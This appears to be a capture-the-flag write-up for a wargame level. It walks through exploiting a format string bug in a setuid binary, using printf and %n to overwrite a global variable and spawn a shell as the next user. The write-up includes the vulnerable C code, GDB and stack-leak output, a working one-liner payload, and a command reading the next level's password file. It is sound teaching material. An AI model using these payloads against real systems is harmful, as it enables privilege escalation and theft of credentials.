# Level 3 — Format String + %n

## Objective

The binary is setuid level4. The global variable `m` must equal `0x40` (64) for `system("/bin/sh")` to be called. `m` is never set to 64 in the normal code flow.

---

## 1. Understanding the Vulnerability

The function `v()` reads user input safely with `fgets`, but then passes it directly to `printf`:

```c
int m = 0;  // global variable at 0x804988c

void v(void) {
    char buf[520];
    fgets(buf, 512, stdin);   // safe: bounded read
    printf(buf);              // VULNERABLE: buf is used as the format string
    if (m == 0x40) {
        system("/bin/sh");    // win condition
    }
}
```

Because `printf(buf)` uses our input as the format string itself, we can inject format specifiers like `%x` and `%n`.

### What does `%n` do?

`%n` writes the **number of characters printed so far** into the memory address pointed to by the corresponding argument.

```c
int x;
printf("AAAA%n", &x);
// x is now 4
```

This means: if we can control how many characters are printed, and supply the address of `m`, we can write any value we want into `m`.

---

## 2. Finding the Address of `m`

In GDB:

```bash
(gdb) p &m
$1 = 0x804988c
```

Target address: **`0x804988c`**

---

## 3. Finding the Stack Position of Our Buffer

We send a recognizable pattern to locate where our input sits on the stack:

```bash
echo "AAAA %x %x %x %x %x %x" | ./level3
AAAA 200 b7fd1ac0 b7ff37d0 41414141 20782520 25207825
```

- `AAAA` at the start → printf printing the literal characters from the format string
- `41414141` in the middle → printf reading the stack with `%x` and finding our buffer (A = 0x41 in ASCII)

Counting the positions:

```
Position 1: 200
Position 2: b7fd1ac0
Position 3: b7ff37d0
Position 4: 41414141  ← our buffer starts HERE
```

Our buffer is at **stack position 4**. This means we must use `%4$n`.

---

## 4. Building the Payload

We need exactly **64 characters** printed before `%n` hits.

```
[address of m — 4 bytes] + [%60x] + [%4$n]
     4 chars printed         60 chars      write 64 to m
```

- `\x8c\x98\x04\x08` → address `0x804988c` in little-endian (x86 stores least significant byte first)
- `%60x` → prints 60 characters (pads a hex value with spaces)
- `%4$n` → writes the total character count (64) into the address at stack position 4

Total characters printed: 4 + 60 = **64 = 0x40** ✓

---


## 5. Executing the Exploit

```bash
(python -c 'print "\x8c\x98\x04\x08" + "%60x" + "%4$n"'; cat) | ./level3
```

### What happens step by step:

1. Python sends the payload into stdin
2. `cat` keeps stdin open so the spawned shell doesn't die immediately
3. `fgets` reads the payload into `buf`
4. `printf(buf)` executes:
   - Prints the 4 address bytes → **4 chars printed**
   - `%60x` prints a padded hex value → **64 chars total**
   - `%4$n` writes 64 into memory at `0x804988c` (which is `m`)
5. The check `if (m == 0x40)` is now **true**
6. `system("/bin/sh")` executes

```bash
$ whoami
level4
$ cat /home/user/level4/.pass
```

---

## 6. Summary

```
Stack when printf runs:

Position 1: 200
Position 2: b7fd1ac0
Position 3: b7ff37d0
Position 4: 0x804988c  ← address of m (we put it here)
...

printf sees:
  \x8c\x98\x04\x08 → prints 4 chars
  %60x             → prints 60 chars  (total = 64)
  %4$n             → writes 64 into address at position 4
                                             ↓
                                      m = 64 = 0x40 ✓
```

| Step | Action |
|------|--------|
| 1 | Find address of `m` with GDB: `0x804988c` |
| 2 | Find stack position of buffer with AAAA leak test: position **4** |
| 3 | Build payload: address + `%60x` + `%4$n` |
| 4 | Print exactly 64 chars so `%n` writes 64 into `m` |
| 5 | Win condition `m == 0x40` is true → shell spawns |

---

